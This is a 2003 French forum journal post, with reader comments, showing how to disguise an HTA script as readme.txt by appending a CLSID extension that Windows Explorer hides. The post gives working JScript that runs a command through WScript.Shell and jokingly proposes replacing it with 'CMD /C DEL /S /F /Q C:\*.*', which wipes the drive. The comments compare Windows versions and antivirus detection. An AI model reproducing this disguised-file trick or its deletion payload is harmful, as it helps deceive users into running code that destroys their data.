Journal Jouons avec windows

Posté par  .
Étiquettes : aucune
0
29
déc.
2003
Soit un fichier nommé readme.txt dans lequel nous mettons :

<script>
a=new ActiveXObject("WSCript.Shell");
a.run("CALC");
alert("I am .HTA\n Started command");
</script>

Jusque là, rien d'extraordinaire, mais renommons-le en readme.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B} (oui, avec tous les machins héxadécimaux entre accolades après le point).

C'est rigolo, l'extension en hexadécimal n'apparait pas dans exprorer ! On ne voit que readme.txt, un banal fichier texte qui nous demande de le double-cliquer... Et quand on double-clique dessus, c'est magique !

Vous pouvez bien sûr remplacer le CALC par des truc plus rigolos comme "CMD /C DEL /S /F /Q C:\*.*".

  • # Re: Jouons avec windows

    Posté par  . Évalué à 2.

    Ce genre de trucs passe avec Outlook ?
    Même en désactivant l'ouverture automatique des pièces jointes ?

    • [^] # Re: Jouons avec windows

      Posté par  . Évalué à 2.

      Si tu specifie dans Explorer d'afficher toutes les extensions tu vois la partie entre les accolades. Mais bon la plupart des gens ne le font pas.

      • [^] # Re: Jouons avec windows

        Posté par  . Évalué à 1.

        Pas sous Windows 2000, j'affiche toutes les extensions et je ne vois que l'extension ".txt".

        R.

      • [^] # Re: Jouons avec windows

        Posté par  . Évalué à 2.

        J'ai failli répondre comme toi mais en fait il a raison... ce ne sont que certaines valeurs entre accolades qui seront effectivement masqué... d'autre s'afficheront.
        Je n'ai pas essayé avec son exemple mais avec celui donné plus bas ( http://www.guninski.com/clsidext.html(...) )

        J'ai effectivement ce problème sous win98SE

  • # Re: Jouons avec windows

    Posté par  (site web personnel) . Évalué à 1.

    attention tu risques des poursuites pour cette divulgation.

  • # Re: Jouons avec windows

    Posté par  . Évalué à 1.

    ici, sur un winxp avec l'affichage des extentions activé, le fichier apparait bien en *.txt mais avec l'icone des fichiers non associés avec une application et pas avec celle des *.txt

    • [^] # Re: Jouons avec windows

      Posté par  . Évalué à 1.

      Je suis sous XP également, mais j'ai tout qui s'affiche ??
      Le fichier n'est pas non plus associé au bloc note, et me lance bien la calculette.

    • [^] # Re: Jouons avec windows

      Posté par  . Évalué à 2.

      c'est logique, tu as bien un executable en face de toi. il suffit qu'un petit malin prenne l'icone attribué par defaut au fichier txt, jpg, mp3, ou tout ce qui pourrait paraitre innocent pour trompter l'utilisateur.

      le script fourni n'est qu'un exemple, si cela "marche", cela marche avec tous les executables.

      la reference en accolade se trouve dans la bdr et identify le fichier comme == executable.

      plagiats

      • [^] # Re: Jouons avec windows

        Posté par  . Évalué à 1.

        Et c'est possible, ça, de « prendre une icône attribuée par défaut » ? Je pense que si l'extension n'est pas déjà reconnue par Windows (et il faudrait le faire exprès... à moins d'installer un logiciel sournois - un sournoiciel ?), ce problème ne se posera pas.

        (j'en profite pour ajouter mes 2 kopeks : mon Outlook du boulot affiche toute l'extension, sort un gros avertissement et empêche l'exécution immédiate du truc)

    • [^] # Re: Jouons avec windows

      Posté par  . Évalué à 1.

      Pareil, dans outlook express on voit l'extension. Si on veut exécuter le script, Windows ne sait pas comment le lancer.

  • # Re: Jouons avec windows

    Posté par  . Évalué à 2.

    Juste une question ne serai-ce pas une technique pour sensibiliser les gens a la sécu et au libre aussi enfaisant un truc du genre qui affiche un message d'avertissement : même si c'est lourd pkoi pas ?

    Enfin en même temps c'est utilisé quelque chose que tout le monde déteste, donc c'est une mauvaise idée. Je sors : []

    • [^] # Re: Jouons avec windows

      Posté par  . Évalué à 1.

      C'est mal car les gens ne vont retenir que l'action et pas le message qu'elle véhicule et l'association libre = méchants pirates sera vite faite.

  • # Re: Jouons avec windows

    Posté par  . Évalué à 1.

    testé sous XP. effectivement ca marche.

    par contre norton antivirus (..cher..) qualifie directement le readme de virus (..bien..). donc il y a un espoir pour nos amis windowsiens névrotiques applicants régulièrement leurs mises à jour et disposant d'un antivirus également mis à jour régulièrement.

    quoi "ce n'est pas le cas de la majorité des windowsiens" ?
    a vous écouter on finirait par croire qu'une faille corrigée depuis plusieurs mois pourrait se transformer en gros virus de l'année qui "blast" tout sur son passage... ;-)

    plagiats

    • [^] # Re: Jouons avec windows

      Posté par  . Évalué à 1.

      Avec PCCillin et windows XP ça marche très bien, xp affiche bien le nom complet mais l'antivirus n'y voit que du feux.

      • [^] # Re: Jouons avec windows

        Posté par  . Évalué à 1.

        Avec Win2000 pro, il m'affiche toute l'extension et au moment d'enregistrer , VirusScan m'a alerté de la présence d'un trojan lié à ce fichier. Je suis presque épaté :).

  • # Re: Jouons avec windows

    Posté par  (site web personnel) . Évalué à 1.

    Il faut desactiver "Masquer les fichiers protégés du système d'exploitation (recommandé)" dans les options des dossiers sous xp pour voir l'extention !


    Comme c'est du recommandé , les utilisateur ne veront pas l'extention bizarre et ce feront avoir !

    Vive MS !

Suivre le flux des commentaires

Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.